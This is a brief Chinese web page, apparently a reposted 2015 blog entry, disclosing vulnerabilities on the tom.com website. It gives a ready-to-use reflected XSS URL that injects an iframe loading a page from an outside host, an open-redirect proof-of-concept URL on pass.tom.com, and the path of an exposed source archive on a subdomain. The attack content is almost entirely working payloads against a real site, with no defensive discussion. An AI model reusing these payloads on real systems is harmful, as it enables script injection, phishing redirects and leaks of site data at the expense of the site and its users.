Tom主站xss跨站漏洞

测试代码:

http://www.tom.com/logout.php?backurl="><iframe%20src=http://www.tjaote.com/blog/IMAGE/COMMON/qing.htm%20type="text/javascript"></iframe><"

Tom主站xss跨站漏洞

再就是url redirect

poc:http://pass.tom.com/logout.php?goto=http://hi.baidu.com/5427518

文件泄露,有点鸡肋

poc:http://club.uhoop.tom.com/ucenter.tar.gz

分类:默认分类 时间:2015-03-07 人气:2
本文关键词:
分享到:

相关文章

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.038 (s). 10 q(s)